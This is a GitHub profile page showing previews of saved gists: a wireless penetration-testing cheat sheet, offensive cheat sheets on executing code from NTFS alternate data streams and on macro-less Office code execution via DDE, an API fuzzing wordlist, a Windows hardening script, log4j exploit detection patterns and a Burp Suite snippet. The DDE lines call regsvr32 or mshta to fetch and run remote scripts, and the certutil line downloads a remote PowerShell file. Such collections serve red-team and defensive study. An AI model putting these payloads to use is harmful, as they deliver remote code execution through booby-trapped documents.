Skip to content

Instantly share code, notes, and snippets.

View oakkaya's full-sized avatar
🪁
Entertaiment Never End

Oğuzhan Akkaya oakkaya

🪁
Entertaiment Never End
50 followers · 206 following
View GitHub Profile
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active October 19, 2024 21:39
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@mgeeky
mgeeky / Macro-Less-Cheatsheet.md
Created February 2, 2018 00:08
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active November 17, 2024 16:48
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@api0cradle
api0cradle / windows_hardening.cmd
Created February 24, 2020 07:29 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active September 11, 2024 21:41
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@irsdl
irsdl / bambdas_highlighter.java
Created November 27, 2023 21:54
Highlighting case using Burp Suite Bambda
// by @irsdl
boolean manualColorHighlightEnabled = true; // e.g. BurpRed anywhere in the request
boolean pwnFoxColorHighlightEnabled = true; // to support PwnFox Firefox extension containers
// BEGIN HIGHLIGHT LOGIC {
boolean hasAlreadyBeenColoured = false;
/* Manual highlight logic to see something like BurpRed */
if(manualColorHighlightEnabled){
Pattern manualHighlightPattern = Pattern.compile("burp([a-z]{3,7}+)", Pattern.CASE_INSENSITIVE); // like burpRed or burpYellow